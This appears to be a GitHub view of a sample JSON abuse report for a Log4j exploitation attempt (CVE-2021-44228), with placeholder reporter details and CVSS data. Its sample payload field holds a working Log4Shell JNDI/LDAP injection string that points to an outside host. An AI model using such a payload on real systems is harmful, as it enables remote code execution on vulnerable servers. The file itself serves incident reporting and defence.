-
Notifications
You must be signed in to change notification settings - Fork 19
/
Copy pathexploit_sample.json
37 lines (37 loc) · 1002 Bytes
/
exploit_sample.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
{
"Version": "3",
"ReporterInfo": {
"ReporterOrg": "ExampleOrg",
"ReporterOrgDomain": "example.com",
"ReporterOrgEmail": "[email protected]",
"ReporterContactEmail": "[email protected]",
"ReporterContactName": "Mr. Example",
"ReporterContactPhone": "+ 01 000 1234567"
},
"Disclosure": true,
"Report": {
"ReportType": "Exploit",
"ReportClass": "Activity",
"FirstSeen": "2022-08-22T15:17:10Z",
"Date": "2022-08-24T11:21:10Z",
"ServiceName": "Log4j",
"SourceIp": "192.0.2.55",
"SourcePort": 54321,
"Samples": [
{
"ContentType": "text/plain",
"Base64Encoded": false,
"Description": "Log line",
"Payload": "${jndi:ldap://123.123.123.123:1389/Exploit}"
}
],
"DestinationIp": "123.123.123.123",
"DestinationPort": 1389,
"CVE": "CVE-2021-44228",
"CVSS": {
"Version": "3.1",
"Score": 10.0,
"Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
}
}
}